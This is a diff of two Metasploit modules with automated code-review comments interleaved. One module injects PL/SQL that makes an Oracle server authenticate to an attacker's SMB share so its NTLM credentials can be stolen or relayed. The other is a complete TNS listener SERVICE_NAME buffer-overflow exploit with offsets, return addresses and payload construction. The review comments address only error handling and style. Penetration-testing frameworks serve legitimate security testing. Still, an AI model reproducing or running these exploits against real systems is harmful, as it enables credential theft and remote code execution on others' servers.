diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
index b6713b0c89..c28f158df9 100644
--- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
+++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
@@ -1,80 +1,82 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::FILEFORMAT
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Owning Windows server using Oracle database unpivileged user',
- 'Description' => %q{
- This module will help you to get Administrator access to OS using unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges)
- To do this you must firstly run smb_sniffer of smb_relay module on your sever. Then you must connect to
- Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS.
- So if smb_relay is working you will get Administrators access to server which runs Oracle of not than you can decrypt HALFLM hash.
- },
- 'Author' => [ 'Sh2kerr ' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision:$',
- 'References' =>
- [
-
- [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
-
- ],
- 'DisclosureDate' => 'April 7 2009'))
-
- register_options(
- [
- OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0']),
- OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
- OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
-
- ], self.class)
- end
-
- def run
- name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
- name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
- rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
- rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
- rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
-
- prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
- prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
-
- exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
-
- prp = Rex::Text.encode_base64(prepare)
- prp1 = Rex::Text.encode_base64(prepare1)
- exp1 = Rex::Text.encode_base64(exploiting1)
-
- sql = %Q|
- DECLARE
- #{rand1} VARCHAR2(32767);
- #{rand2} VARCHAR2(32767);
- #{rand3} VARCHAR2(32767);
- BEGIN
- #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
- EXECUTE IMMEDIATE #{rand1};
- #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));
- EXECUTE IMMEDIATE #{rand2};
- #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
- EXECUTE IMMEDIATE #{rand3};
- END;
- /
- |
-
- print_status("Creating '#{datastore['FILENAME']}' file ...")
- file_create(sql)
-
- end
-
-end
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::ORACLE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Owning Windows server using Oracle database unpivileged user.',
+ 'Description' => %q{
+ This module will help you to get Administrator access to OS using unprivileged
+ Oracle database user (you need only CONNECT and RESOURCE privileges)
+ To do this you must firstly run smb_sniffer of smb_relay module on your sever.
+ Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
+ which will connect to your SMB sever with credentials of Oracle RDBMS.
+ So if smb_relay is working you will get Administrators access to server which runs
+ Oracle of not than you can decrypt HALFLM hash.
+ },
+ 'Author' => [ 'Sh2kerr ' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
+ ],
+ 'DisclosureDate' => 'Apr 7 2009'))
+
+ register_options(
+ [
+ OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
+ ], self.class)
+ end
+
+ def run
+
+ name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+
+ prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
+ prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
+
+ exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
+
+ prp = Rex::Text.encode_base64(prepare)
+ prp1 = Rex::Text.encode_base64(prepare1)
+ exp1 = Rex::Text.encode_base64(exploiting1)
+
+ sql = %Q|
+ DECLARE
+ #{rand1} VARCHAR2(32767);
+ #{rand2} VARCHAR2(32767);
+ #{rand3} VARCHAR2(32767);
+ BEGIN
+ #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
+ EXECUTE IMMEDIATE #{rand1};
+ #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));
+ EXECUTE IMMEDIATE #{rand2};
+ #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
+ EXECUTE IMMEDIATE #{rand3};
+ END;
+ |
+
+ begin
+ print_status("Executing #{self.name}...")
+ prepare_exec(sql)
+ rescue => e
+ return
+ end
+
+ end
+
+end
diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb
new file mode 100644
index 0000000000..34b1d9d04a
--- /dev/null
+++ b/modules/exploits/windows/oracle/tns_service_name.rb
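Review bot: The `rescue => e` / `return` at the end of `run` swallows every StandardError raised by `prepare_exec` and never uses `e`, so a failed connection or a rejected SQL statement ends the module with no output and looks the same as success to the operator. Replace the handler with `rescue => e; print_error("Failed to execute SQL: #{e.class}: #{e.message}"); return`, or drop the `begin`/`rescue` entirely and let the framework report the exception. The 'Name' string in `initialize` also ends with a trailing period and keeps the typo `unpivileged`.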
@@ -0,0 +1,95 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::TNS
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Oracle TNS Listener SERVICE_NAME Buffer Overflow.',
+ 'Description' => %q{
+ This module exploits a stack overflow in Oracle. When
+ sending a specially crafted packet containing a long SERVICE_NAME
+ to the TNS service, an attacker may be able to execute arbitrary code.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'BID', '4845'],
+ [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ],
+ [ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ],
+ ],
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 600,
+ 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
+ 'StackAdjustment' => -3500,
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)', { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ],
+ [ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)', { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] ,
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'May 27 2002'))
+
+ register_options([Opt::RPORT(1521)], self.class)
+
+ end
+
+ def check
+ connect
+
+ version = "(CONNECT_DATA=(COMMAND=VERSION))"
+
+ pkt = tns_packet(version)
+
+ sock.put(pkt)
+
+ sock.get_once
+
+ res = sock.get_once(-1, 1)
+
+ disconnect
+
+ if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ 
connect + + buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded + buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') + buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400) + + sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))" + + pkt = tns_packet(sploit) + + print_status("Trying target #{target.name}...") + sock.put(pkt) + + handler + + disconnect + end + +end
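Review bot: `check` reports Vulnerable only when the VERSION banner matches `/32-bit Windows: Version 8\.1\.7\.0\.0/` and otherwise returns Safe, so a listener that is unreachable, times out, or runs any other build is reported as Safe rather than as not determined; a comment above the `if` should state that, e.g. `# Only the 8.1.7.0.0 32-bit Windows banner is fingerprinted; anything else (including no response) is reported Safe`. The condition also uses `and` where `&&` is the idiomatic boolean operator (`if res && res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/`), and the first bare `sock.get_once` discards a response with no comment on what it consumes (presumably the listener's accept/refuse reply before the version data — worth confirming and noting). Both `check` and `exploit` are complete within this hunk.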